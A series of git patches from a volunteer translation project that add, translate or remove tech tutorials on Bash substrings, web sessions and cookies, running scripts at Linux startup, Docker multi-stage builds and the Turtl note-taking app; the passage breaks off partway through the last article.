+[4]:http://www.linkedin.com/shareArticle?mini=true&url=http://linuxgizmos.com/google-launches-tensorflow-based-vision-recognition-kit-for-rpi-zero-w/ +[5]:http://reddit.com/submit?url=http://linuxgizmos.com/google-launches-tensorflow-based-vision-recognition-kit-for-rpi-zero-w/&title=Google%20launches%20TensorFlow-based%20vision%20recognition%20kit%20for%20RPi%20Zero%20W +[6]:mailto:?subject=Google%20launches%20TensorFlow-based%20vision%20recognition%20kit%20for%20RPi%20Zero%20W&body=%20http://linuxgizmos.com/google-launches-tensorflow-based-vision-recognition-kit-for-rpi-zero-w/ +[7]:http://linuxgizmos.com/free-raspberry-pi-voice-kit-taps-google-assistant-sdk/ +[8]:http://linuxgizmos.com/google-releases-cloud-vision-api-with-demo-for-pi-based-robot/ +[9]:http://linuxgizmos.com/files/google_aiyvisionkit.jpg +[10]:http://linuxgizmos.com/files/rpi_zerow.jpg +[11]:http://linuxgizmos.com/raspberry-pi-cameras-jump-to-8mp-keep-25-dollar-price/ +[12]:http://linuxgizmos.com/files/google_aiyvisionkit_pieces.jpg +[13]:http://linuxgizmos.com/files/google_visionbonnet.jpg +[14]:https://developers.googleblog.com/2017/11/announcing-tensorflow-lite.html +[15]:http://linuxgizmos.com/files/google_aiyvisionkit_assembly.jpg +[16]:http://linuxgizmos.com/files/movidius_myriad2vpu_block.jpg +[17]:http://linuxgizmos.com/files/movidius_myriad2_reference_board.jpg +[18]:https://blog.google/topics/machine-learning/introducing-aiy-vision-kit-make-devices-see/ +[19]:https://developers.googleblog.com/2017/11/introducing-aiy-vision-kit-add-computer.html +[20]:http://www.microcenter.com/site/content/Google_AIY.aspx?ekw=aiy&rd=1 +[21]:http://linuxgizmos.com/raspberry-pi-zero-w-adds-wifi-and-bluetooth-for-only-5-more/ +[22]:https://www.movidius.com/solutions/vision-processing-unit +[23]:https://www.tensorflow.org/ +[24]:https://research.googleblog.com/2017/06/mobilenets-open-source-models-for.html +[25]:http://linuxgizmos.com/usb-stick-brings-neural-computing-functions-to-devices/ +[26]:http://linuxgizmos.com/google-launches-tensorflow-based-vision-recognition-kit-for-rpi-zero-w/ From a17560c6964ea00b15a48dda40041ec9cad2a792 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 9 Dec 2017 17:32:16 +0800 Subject: [PATCH 0453/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2009=E6=97=A5=20=E6=98=9F=E6=9C=9F=E5=85=AD=2017:32:1?= =?UTF-8?q?6=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...171206 How to extract substring in Bash.md | 87 ++++++++++--------- 1 file changed, 46 insertions(+), 41 deletions(-) rename {sources => translated}/tech/20171206 How to extract substring in Bash.md (59%) diff --git a/sources/tech/20171206 How to extract substring in Bash.md b/translated/tech/20171206 How to extract substring in Bash.md similarity index 59% rename from sources/tech/20171206 How to extract substring in Bash.md rename to translated/tech/20171206 How to extract substring in Bash.md index 945b8bd4dd..f1deaebab9 100644 --- a/sources/tech/20171206 How to extract substring in Bash.md +++ b/translated/tech/20171206 How to extract substring in Bash.md @@ -1,52 +1,51 @@ -translating by lujun9972 -How to extract substring in Bash +如何在 Bash 中抽取子字符串 ====== -A substring is nothing but a string is a string that occurs “in”. For example “3382” is a substring of “this is a 3382 test”. One can extract the digits or given string using various methods. +子字符串不是别的,就是出现在其他字符串内的字符串。 比如 “3382” 就是 “this is a 3382 test” 的子字符串。 我们有多种方法可以从中把数字或指定部分字符串抽取出来。 [![How to Extract substring in Bash Shell on Linux or Unix](https://www.cyberciti.biz/media/new/faq/2017/12/How-to-Extract-substring-in-Bash-Shell-on-Linux-or-Unix.jpg)][2] -This quick tutorial shows how to obtain or finds substring when using bash shell. +本文会向你展示在 bash shell 中如何获取或者说查找出子字符串。 -### Extract substring in Bash +### 在 Bash 中抽取子字符串 -The syntax is: ## syntax ## ${parameter:offset:length} The substring expansion is a bash feature. It expands to up to length characters of the value of parameter starting at the character specified by offset. For example, $u defined as follows: - -| +其语法为: +```shell +## syntax ## +${parameter:offset:length} ``` +子字符串扩展是 bash 的一项功能。它会扩展成 parameter 值中以 offset 为开始,长为 length 个字符的字符串。 假设, $u 定义如下: + +```shell ## define var named u ## u="this is a test" ``` - | -The following substring parameter expansion performs substring extraction: +那么下面参数的子字符串扩展会抽取出子字符串: -| -``` +```shell var="${u:10:4}" echo "${var}" ``` - | -Sample outputs: +结果为: ``` test ``` -* 10 : The offset +其中这些参数分别表示: ++ 10 : 偏移位置 ++ 4 : 长度 -* 4 : The length +### 使用 IFS -### Using IFS +根据 bash 的 man 页说明: -From the bash man page: +> The Internal Field Separator that is used for word splitting after expansion and to split lines into words with the read builtin command。The default value is。 -> The Internal Field Separator that is used for word splitting after expansion and to split lines into words with the read builtin command. The default value is . +另一种 POSIX 就绪(POSIX ready) 的方案如下: -Another POSIX ready solution is as follows: - -| -``` +```shell u="this is a test" set -- $u echo "$1" @@ -54,20 +53,20 @@ echo "$2" echo "$3" echo "$4" ``` - | -Sample outputs: +输出为: -``` +```shell this is a test ``` -| -``` -#!/bin/bash +下面是一段 bash 代码,用来从 Cloudflare cache 中去除带主页的 url + +```shell +#!/bin/bash #################################################### ## Author - Vivek Gite {https://www.cyberciti.biz/} ## Purpose - Purge CF cache @@ -98,7 +97,7 @@ get_home_url(){ } echo -echo "Purging cache from Cloudflare..." +echo "Purging cache from Cloudflare。.。" echo for u in $urls do @@ -108,21 +107,22 @@ do -H "X-Auth-Email: ${email_id}" \ -H "X-Auth-Key: ${api_key}" \ -H "Content-Type: application/json" \ - --data "{\"files\":[\"${u}\",\"${amp_url}\",\"${home_url}\"]}" + --data "{\"files\":[\"${u}\",\"${amp_url}\",\"${home_url}\"]}" echo done echo ``` - | -I can run it as follows: ~/bin/cf.clear.cache https://www.cyberciti.biz/faq/bash-for-loop/ https://www.cyberciti.biz/tips/linux-security.html - -### Say hello to cut command - -One can remove sections from each line of file or variable using the cut command. The syntax is: - -| +它的使用方法为: +```shell +~/bin/cf.clear.cache https://www.cyberciti.biz/faq/bash-for-loop/ https://www.cyberciti.biz/tips/linux-security.html ``` + +### 借助 cut 命令 + +可以使用 cut 命令来将文件中每一行或者变量中的一部分删掉。它的语法为: + +```shell u="this is a test" echo "$u" | cut -d' ' -f 4 echo "$u" | cut --delimiter=' ' --fields=4 @@ -134,9 +134,14 @@ echo "$u" | cut --delimiter=' ' --fields=4 var="$(cut -d' ' -f 4 <<< $u)" echo "${var}" ``` - | -For more info read bash man page: man bash man cut See also: [Bash String Comparison: Find Out IF a Variable Contains a Substring][1] +想了解更多请阅读 bash 的 man 页: +```shell +man bash +man cut +``` + +另请参见: [Bash String Comparison: Find Out IF a Variable Contains a Substring][1] -------------------------------------------------------------------------------- From 2e6ce6badf87ae04b3f13dd23eb01f3ed70c52fa Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 9 Dec 2017 17:53:04 +0800 Subject: [PATCH 0454/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Sessions=20And?= =?UTF-8?q?=20Cookies=20=E2=80=93=20How=20Does=20User-Login=20Work?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... And Cookies – How Does User-Login Work.md | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 sources/tech/20171208 Sessions And Cookies – How Does User-Login Work.md diff --git a/sources/tech/20171208 Sessions And Cookies – How Does User-Login Work.md b/sources/tech/20171208 Sessions And Cookies – How Does User-Login Work.md new file mode 100644 index 0000000000..a53b0f8d61 --- /dev/null +++ b/sources/tech/20171208 Sessions And Cookies – How Does User-Login Work.md @@ -0,0 +1,73 @@ +translating by lujun9972 +Sessions And Cookies – How Does User-Login Work? +====== +Facebook, Gmail, Twitter we all use these websites every day. One common thing among them is that they all require you to log in to do stuff. You cannot tweet on twitter, comment on Facebook or email on Gmail unless you are authenticated and logged in to the service. + + [![gmail, facebook login page](http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1.jpg)][1] + +So how does it work? How does the website authenticate us? How does it know which user is logged in and from where? Let us answer each of these questions below. + +### How User-Login works? + +Whenever you enter your username and password in the login page of a site, the information you enter is sent to the server. The server then validates your password against the password on the server. If it doesn’t match, you get an error of incorrect password. But if it matches, you get logged in. + +### What happens when I get logged in? + +When you get logged in, the web server initiates a session and sets a cookie variable in your browser. The cookie variable then acts as a reference to the session created. Confused? Let us simplify this. + +### How does Session work? + +When the username and password are right, the server initiates a session. Sessions have a really complicated definition so I like to call them ‘beginning of a relationship’. + + [![session beginning of a relationship or partnership](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-9.png)][2] + +When the credentials are right, the server begins a relationship with you. Since the server cannot see like us humans, it sets a cookie in our browsers to identify our unique relationship from all the other relationships that other people have with the server. + +### What is a Cookie? + +A cookie is a small amount of data that the websites can store in your browser. You must have seen them here. + + [![theitstuff official facebook page cookies](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-1-4.png)][3] + +So when you log in and the server has created a relationship or session with you, it takes the session id which is the unique identifier of that session and stores it in your browser in form of cookies. + +### What’s the Point? + +The reason all of this is needed is to verify that it’s you so that when you comment or tweet, the server knows who did that tweet or who did that comment. + +As soon as you’re logged in, a cookie is set which contains the session id. Now, this session id is granted to the person who enters the correct username and password combination. + + [![facebook cookies in web browser](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-2-3-e1508926255472.png)][4] + +So the session id is granted to the person who owns that account. Now whenever an activity is performed on that website, the server knows who it was by their session id. + +### Keep me logged in? + +The sessions have a time limit. Unlike the real world where relationships can last even without seeing the person for longer periods of time, sessions have a time limit. You have to keep telling the server that you are online by performing some or the other actions. If that doesn’t happen the server will close the session and you will be logged out. + + [![websites keep me logged in option](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-3-3-e1508926314117.png)][5] + +But when we use the Keep me logged in feature on some websites, we allow them to store another unique variable in the form of cookies in our browsers. This unique variable is used to automatically log us in by checking it against the one on the server. When someone steals this unique identifier it is called as cookie stealing. They then get access to your account. + +### Conclusion + +We discussed how Login Systems work and how we are authenticated on a website. We also learned about what sessions and cookies are and how they are implemented in login mechanism. + +I hope you guys have grasped that how User-Login works, and if you still have a doubt regarding anything, just drop in a comment and I’ll be there for you. + +-------------------------------------------------------------------------------- + +via: http://www.theitstuff.com/sessions-cookies-user-login-work + +作者:[Rishabh Kandari][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.theitstuff.com/author/reevkandari +[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1.jpg +[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-9.png +[3]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-1-4.png +[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-2-3-e1508926255472.png +[5]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-3-3-e1508926314117.png From 395752355d42394ef687715127ddf6b11e12ce2e Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 9 Dec 2017 18:16:39 +0800 Subject: [PATCH 0455/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Executing=20Com?= =?UTF-8?q?mands=20and=20Scripts=20at=20Reboot=20&=20Startup=20in=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...nd Scripts at Reboot & Startup in Linux.md | 64 +++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 sources/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md diff --git a/sources/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md b/sources/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md new file mode 100644 index 0000000000..04c922aa41 --- /dev/null +++ b/sources/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md @@ -0,0 +1,64 @@ +translating by lujun9972 +Executing Commands and Scripts at Reboot & Startup in Linux +====== +There might arise a need to execute a command or scripts at reboot or every time when we start our system. So how can we do that, in this tutorial we are going to discuss just that. We will discuss how we can make our CentOS/RHEL and Ubuntu systems to execute a command or scripts at reboot or at system startup using two different methods. Both the methods are tested and works just fine, + +### Method 1 – Using rc.local + +In this method, we will use ‘rc.local’ file located in ‘/etc/’ to execute our scripts and commands at startup. We will make an entry to execute the script in the file & every time when our system starts, the script will be executed. + +But we will first provide the permissions to make the file /etc/rc.local executable, + +$ sudo chmod +x /etc/rc.local + +Next we will add the script to be executed in the file, + +$ sudo vi /etc/rc.local + +& at the bottom of file, add the entry + +sh /root/script.sh & + +Now save the file & exit. Similarly we can execute a command using rc.local file but we need to make sure that we mention the full path of the command. To locate the full command path, run + +$ which command + +For example, + +$ which shutter + +/usr/bin/shutter + +For CentOS, we use file ‘/etc/rc.d/rc.local’ instead of ‘/etc/rc.local’. We also need to make this file executable before adding any script or command to the file. + +Note:- When executing a script at startup, make sure that the script ends with ‘exit 0’. + +( Recommended Read : ) + +### Method 2 – Crontab method + +This method is the easiest method of the two methods. We will create a cron job that will wait for 90 seconds after system startup & then will execute the command or script on the system. + +To create a cron job, open terminal & run + +$ crontab -e + +& enter the following line , + +@reboot ( sleep 90 ; sh \location\script.sh ) + +where \location\script.sh is the location of script to be executed. + +So this was our tutorial on how to execute a script or a command when system starts up. Please leave your queries, if any , using the comment box below + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/executing-commands-scripts-at-reboot/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ From 2baffb6ff801b527c6a955b6d1a79a8755a95aa5 Mon Sep 17 00:00:00 2001 From: iron0x <2727586680@qq.com> Date: Sat, 9 Dec 2017 20:18:04 +0800 Subject: [PATCH 0456/1627] create translated file "20171202 docker - Use multi-stage builds.md" create translated file "20171202 docker - Use multi-stage builds.md" --- ...0171202 docker - Use multi-stage builds.md | 128 ++++++++++++++++++ 1 file changed, 128 insertions(+) create mode 100644 translated/tech/20171202 docker - Use multi-stage builds.md diff --git a/translated/tech/20171202 docker - Use multi-stage builds.md b/translated/tech/20171202 docker - Use multi-stage builds.md new file mode 100644 index 0000000000..b8bb2acf0a --- /dev/null +++ b/translated/tech/20171202 docker - Use multi-stage builds.md @@ -0,0 +1,128 @@ +使用多阶段构建 +============================================================ + +多阶段构建是 `Docker 17.05` 或更高版本提供的新功能。这对致力于优化 `Dockerfile` 的人来说,使得 `Dockerfile` 易于阅读和维护。 + +> 致谢: 特别感谢 [Alex Ellis][1] 授权使用他的关于 `Docker` 多阶段构建的博客文章 [Builder pattern vs. Multi-stage builds in Docker][2] 作为以下示例的基础. + +### 在多阶段构建之前 + +关于构建镜像最具挑战性的事情之一是保持镜像体积小巧. `Dockerfile` 中的每条指令都会在镜像中增加一层, 并且在移动到下一层之前, 需要记住清除不需要的构件. 要编写一个非常高效的 `Dockerfile`, 传统上您需要使用 `shell` 技巧和其他逻辑来尽可能地减少层数, 并确保每一层都具有上一层所需的构件, 而不是其他任何东西. +实际上, 有一个 `Dockerfile` 用于开发(其中包含构建应用程序所需的所有内容), 以及另一个用于生产的瘦客户端, 它只包含您的应用程序以及运行它所需的内容. 这被称为"建造者模式". 维护两个 `Dockerfile` 并不理想. + +下面分别是一个 `Dockerfile.build` 和 遵循上面的构建器模式的 `Dockerfile` 的例子: + +`Dockerfile.build`: + +``` +FROM golang:1.7.3 +WORKDIR /go/src/github.com/alexellis/href-counter/ +RUN go get -d -v golang.org/x/net/html +COPY app.go . +RUN go get -d -v golang.org/x/net/html \ + && CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . + +``` + +注意这个例子还使用 Bash && 运算符人为地将两个 `RUN` 命令压缩在一起, 以避免在镜像中创建额外的层. 这很容易失败, 很难维护. 例如, 插入另一个命令时, 很容易忘记继续使用 `\` 字符. + +`Dockerfile`: + +``` +FROM alpine:latest +RUN apk --no-cache add ca-certificates +WORKDIR /root/ +COPY app . +CMD ["./app"] + +``` + +`build.sh`: + +``` +#!/bin/sh +echo Building alexellis2/href-counter:build + +docker build --build-arg https_proxy=$https_proxy --build-arg http_proxy=$http_proxy \ + -t alexellis2/href-counter:build . -f Dockerfile.build + +docker create --name extract alexellis2/href-counter:build +docker cp extract:/go/src/github.com/alexellis/href-counter/app ./app +docker rm -f extract + +echo Building alexellis2/href-counter:latest + +docker build --no-cache -t alexellis2/href-counter:latest . +rm ./app + +``` + +当您运行 `build.sh` 脚本时, 它会构建第一个镜像, 从中创建一个容器, 以便将该构件复制出来, 然后构建第二个镜像. 这两个镜像和应用构件会占用您的系统的空间. + +多阶段构建大大简化了这种情况! + +### 使用多阶段构建 + +在多阶段构建中, 您需要在 `Dockerfile` 中多次使用 `FROM` 声明. 每次 `FROM` 指令可以使用不同的基础镜像, 并且每次 `FROM` 指令都会开始新阶段的构建. 您可以选择将构件从一个阶段复制到另一个阶段, 在最终镜像中, 不会留下您不需要的所有内容. 为了演示这是如何工作的, 让我们调整前一节中的 `Dockerfile` 以使用多阶段构建。 + +`Dockerfile`: + +``` +FROM golang:1.7.3 +WORKDIR /go/src/github.com/alexellis/href-counter/ +RUN go get -d -v golang.org/x/net/html +COPY app.go . +RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . + +FROM alpine:latest +RUN apk --no-cache add ca-certificates +WORKDIR /root/ +COPY --from=0 /go/src/github.com/alexellis/href-counter/app . +CMD ["./app"] + +``` + +您只需要单一个 `Dockerfile`. 不需要分隔构建脚本. 只需运行 `docker build` . + +``` +$ docker build -t alexellis2/href-counter:latest . + +``` + +最终的结果是和以前体积一样小的生产镜像, 复杂性显着降低. 您不需要创建任何中间镜像, 也不需要将任何构件提取到本地系统. + +它是如何工作的呢? 第二条 `FROM` 指令以 `alpine:latest` 镜像作为基础开始新的建造阶段. `COPY --from=0` 这一行将刚才前一个阶段产生的构件复制到这个新阶段. Go SDK和任何中间构件都被保留下来, 而不是只保存在最终的镜像中. +### 命名您的构建阶段 + +默认情况下, 这些阶段没有命名, 您可以通过它们的整数来引用它们, 从第一个 `FROM` 指令的 0 开始. 但是, 您可以通过在 `FROM` 指令中使用 `as ` +来为阶段命名. 以下示例通过命名阶段并在 `COPY` 指令中使用名称来改进前一个示例. 这意味着, 即使您的 `Dockerfile` 中的指令稍后重新排序, `COPY` 也不会中断。 + +``` +FROM golang:1.7.3 as builder +WORKDIR /go/src/github.com/alexellis/href-counter/ +RUN go get -d -v golang.org/x/net/html +COPY app.go . +RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . + +FROM alpine:latest +RUN apk --no-cache add ca-certificates +WORKDIR /root/ +COPY --from=builder /go/src/github.com/alexellis/href-counter/app . +CMD ["./app"] +``` + +> 译者话: 1.此文章系译者第一次翻译英文文档,有描述不清楚或错误的地方,请读者给予反馈(2727586680@qq.com),不胜感激。 +> 译者话: 2.本文只是简单介绍多阶段构建,不够深入,如果读者需要深入了解,请自行查阅相关资料。 +-------------------------------------------------------------------------------- + +via: https://docs.docker.com/engine/userguide/eng-image/multistage-build/#name-your-build-stages + +作者:[docker docs ][a] +译者:[iron0x](https://github.com/iron0x) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://docs.docker.com/engine/userguide/eng-image/multistage-build/ +[1]:https://twitter.com/alexellisuk +[2]:http://blog.alexellis.io/mutli-stage-docker-builds/ From 135c7b542ad0b4e91bfbe8623feb7ba0891e0ad2 Mon Sep 17 00:00:00 2001 From: iron0x <2727586680@qq.com> Date: Sat, 9 Dec 2017 20:19:09 +0800 Subject: [PATCH 0457/1627] Delete 20171202 docker - Use multi-stage builds.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 翻译完成 --- ...0171202 docker - Use multi-stage builds.md | 129 ------------------ 1 file changed, 129 deletions(-) delete mode 100644 sources/tech/20171202 docker - Use multi-stage builds.md diff --git a/sources/tech/20171202 docker - Use multi-stage builds.md b/sources/tech/20171202 docker - Use multi-stage builds.md deleted file mode 100644 index 8cc8af1c94..0000000000 --- a/sources/tech/20171202 docker - Use multi-stage builds.md +++ /dev/null @@ -1,129 +0,0 @@ -【iron0x翻译中】 - -Use multi-stage builds -============================================================ - -Multi-stage builds are a new feature requiring Docker 17.05 or higher on the daemon and client. Multistage builds are useful to anyone who has struggled to optimize Dockerfiles while keeping them easy to read and maintain. - -> Acknowledgment: Special thanks to [Alex Ellis][1] for granting permission to use his blog post [Builder pattern vs. Multi-stage builds in Docker][2] as the basis of the examples below. - -### Before multi-stage builds - -One of the most challenging things about building images is keeping the image size down. Each instruction in the Dockerfile adds a layer to the image, and you need to remember to clean up any artifacts you don’t need before moving on to the next layer. To write a really efficient Dockerfile, you have traditionally needed to employ shell tricks and other logic to keep the layers as small as possible and to ensure that each layer has the artifacts it needs from the previous layer and nothing else. - -It was actually very common to have one Dockerfile to use for development (which contained everything needed to build your application), and a slimmed-down one to use for production, which only contained your application and exactly what was needed to run it. This has been referred to as the “builder pattern”. Maintaining two Dockerfiles is not ideal. - -Here’s an example of a `Dockerfile.build` and `Dockerfile` which adhere to the builder pattern above: - -`Dockerfile.build`: - -``` -FROM golang:1.7.3 -WORKDIR /go/src/github.com/alexellis/href-counter/ -RUN go get -d -v golang.org/x/net/html -COPY app.go . -RUN go get -d -v golang.org/x/net/html \ - && CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . - -``` - -Notice that this example also artificially compresses two `RUN` commands together using the Bash `&&` operator, to avoid creating an additional layer in the image. This is failure-prone and hard to maintain. It’s easy to insert another command and forget to continue the line using the `\` character, for example. - -`Dockerfile`: - -``` -FROM alpine:latest -RUN apk --no-cache add ca-certificates -WORKDIR /root/ -COPY app . -CMD ["./app"] - -``` - -`build.sh`: - -``` -#!/bin/sh -echo Building alexellis2/href-counter:build - -docker build --build-arg https_proxy=$https_proxy --build-arg http_proxy=$http_proxy \ - -t alexellis2/href-counter:build . -f Dockerfile.build - -docker create --name extract alexellis2/href-counter:build -docker cp extract:/go/src/github.com/alexellis/href-counter/app ./app -docker rm -f extract - -echo Building alexellis2/href-counter:latest - -docker build --no-cache -t alexellis2/href-counter:latest . -rm ./app - -``` - -When you run the `build.sh` script, it needs to build the first image, create a container from it in order to copy the artifact out, then build the second image. Both images take up room on your system and you still have the `app` artifact on your local disk as well. - -Multi-stage builds vastly simplify this situation! - -### Use multi-stage builds - -With multi-stage builds, you use multiple `FROM` statements in your Dockerfile. Each `FROM` instruction can use a different base, and each of them begins a new stage of the build. You can selectively copy artifacts from one stage to another, leaving behind everything you don’t want in the final image. To show how this works, Let’s adapt the Dockerfile from the previous section to use multi-stage builds. - -`Dockerfile`: - -``` -FROM golang:1.7.3 -WORKDIR /go/src/github.com/alexellis/href-counter/ -RUN go get -d -v golang.org/x/net/html -COPY app.go . -RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . - -FROM alpine:latest -RUN apk --no-cache add ca-certificates -WORKDIR /root/ -COPY --from=0 /go/src/github.com/alexellis/href-counter/app . -CMD ["./app"] - -``` - -You only need the single Dockerfile. You don’t need a separate build script, either. Just run `docker build`. - -``` -$ docker build -t alexellis2/href-counter:latest . - -``` - -The end result is the same tiny production image as before, with a significant reduction in complexity. You don’t need to create any intermediate images and you don’t need to extract any artifacts to your local system at all. - -How does it work? The second `FROM` instruction starts a new build stage with the `alpine:latest` image as its base. The `COPY --from=0` line copies just the built artifact from the previous stage into this new stage. The Go SDK and any intermediate artifacts are left behind, and not saved in the final image. - -### Name your build stages - -By default, the stages are not named, and you refer to them by their integer number, starting with 0 for the first `FROM` instruction. However, you can name your stages, by adding an `as ` to the `FROM` instruction. This example improves the previous one by naming the stages and using the name in the `COPY` instruction. This means that even if the instructions in your Dockerfile are re-ordered later, the `COPY` won’t break. - -``` -FROM golang:1.7.3 as builder -WORKDIR /go/src/github.com/alexellis/href-counter/ -RUN go get -d -v golang.org/x/net/html -COPY app.go . -RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . - -FROM alpine:latest -RUN apk --no-cache add ca-certificates -WORKDIR /root/ -COPY --from=builder /go/src/github.com/alexellis/href-counter/app . -CMD ["./app"] -``` - --------------------------------------------------------------------------------- - -via: https://docs.docker.com/engine/userguide/eng-image/multistage-build/#name-your-build-stages - -作者:[docker docs ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://docs.docker.com/engine/userguide/eng-image/multistage-build/ -[1]:https://twitter.com/alexellisuk -[2]:http://blog.alexellis.io/mutli-stage-docker-builds/ From 2fad17303cc0953e93f77b9a12515c5722402f48 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 21:43:57 +0800 Subject: [PATCH 0458/1627] Delete 20171206 Getting started with Turtl an open source alternative to Evernote.md --- ... an open source alternative to Evernote.md | 115 ------------------ 1 file changed, 115 deletions(-) delete mode 100644 sources/tech/20171206 Getting started with Turtl an open source alternative to Evernote.md diff --git a/sources/tech/20171206 Getting started with Turtl an open source alternative to Evernote.md b/sources/tech/20171206 Getting started with Turtl an open source alternative to Evernote.md deleted file mode 100644 index 18d7d12f82..0000000000 --- a/sources/tech/20171206 Getting started with Turtl an open source alternative to Evernote.md +++ /dev/null @@ -1,115 +0,0 @@ -Getting started with Turtl, an open source alternative to Evernote -============================================================ - -### Turtl is a solid note-taking tool for users looking for an alternative to apps like Evernote and Google Keep. - -![Using Turtl as an open source alternative to Evernote](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUS_brainstorm_island_520px.png?itok=6IUPyxkY "Using Turtl as an open source alternative to Evernote") -Image by : opensource.com - -Just about everyone I know takes notes, and many people use an online note-taking application like Evernote, Simplenote, or Google Keep. Those are all good tools, but you have to wonder about the security and privacy of your information—especially in light of [Evernote's privacy flip-flop of 2016][11]. If you want more control over your notes and your data, you really need to turn to an open source tool. - -Whatever your reasons for moving away from Evernote, there are open source alternatives out there. Let's look at one of those alternatives: Turtl. - -### Getting started - -The developers behind [Turtl][12] want you to think of it as "Evernote with ultimate privacy." To be honest, I can't vouch for the level of privacy that Turtl offers, but it is a quite a good note-taking tool. - -To get started with Turtl, [download][13] a desktop client for Linux, Mac OS, or Windows, or grab the [Android app][14]. Install it, then fire up the client or app. You'll be asked for a username and passphrase. Turtl uses the passphrase to generate a cryptographic key that, according to the developers, encrypts your notes before storing them anywhere on your device or on their servers. - -### Using Turtl - -You can create the following types of notes with Turtl: - -* Password - -* File - -* Image - -* Bookmark - -* Text note - -No matter what type of note you choose, you create it in a window that's similar for all types of notes: - - -![Create new text note with Turtl](https://opensource.com/sites/default/files/images/life-uploads/turtl-new-note-520.png "Creating a new text note with Turtl") - -Creating a new text note in Turtl - -Add information like the title of the note, some text, and (if you're creating a File or Image note) attach a file or an image. Then click **Save**. - -You can add formatting to your notes via [Markdown][15]. You need to add the formatting by hand—there are no toolbar shortcuts. - -If you need to organize your notes, you can add them to **Boards**. Boards are just like notebooks in Evernote. To create a new board, click on the **Boards** tab, then click the **Create a board** button. Type a title for the board, then click **Create**. - - -![Create new board in Turtl](https://opensource.com/sites/default/files/images/life-uploads/turtl-boards-520.png "Creating a new Turtl board") - -Creating a new board in Turtl - -To add a note to a board, create or edit the note, then click the **This note is not in any boards** link at the bottom of the note. Select one or more boards, then click **Done**. - -To add tags to a note, click the **Tags** icon at the bottom of a note, enter one or more keywords separated by commas, and click **Done**. - -### Syncing your notes across your devices - -If you use Turtl across several computers and an Android device, for example, Turtl will sync your notes whenever you're online. However, I've encountered a small problem with syncing: Every so often, a note I've created on my phone doesn't sync to my laptop. I tried to sync manually by clicking the icon in the top left of the window and then clicking **Sync Now**, but that doesn't always work. I found that I occasionally need to click that icon, click **Your settings**, and then click **Clear local data**. I then need to log back into Turtl, but all the data syncs properly. - -### A question, and a couple of problems - -When I started using Turtl, I was dogged by one question:  _Where are my notes kept online?_  It turns out that the developers behind Turtl are based in the U.S., and that's also where their servers are. Although the encryption that Turtl uses is [quite strong][16] and your notes are encrypted on the server, the paranoid part of me says that you shouldn't save anything sensitive in Turtl (or any online note-taking tool, for that matter). - -Turtl displays notes in a tiled view, reminiscent of Google Keep: - - -![Notes in Turtl](https://opensource.com/sites/default/files/images/life-uploads/turtl-notes-520.png "Collection of notes in Turtl") - -A collection of notes in Turtl - -There's no way to change that to a list view, either on the desktop or on the Android app. This isn't a problem for me, but I've heard some people pan Turtl because it lacks a list view. - -Speaking of the Android app, it's not bad; however, it doesn't integrate with the Android **Share** menu. If you want to add a note to Turtl based on something you've seen or read in another app, you need to copy and paste it manually. - -I've been using a Turtl for several months on a Linux-powered laptop, my [Chromebook running GalliumOS][17], and an Android-powered phone. It's been a pretty seamless experience across all those devices. Although it's not my favorite open source note-taking tool, Turtl does a pretty good job. Give it a try; it might be the simple note-taking tool you're looking for. - - -### About the author - - [![That idiot Scott Nesbitt 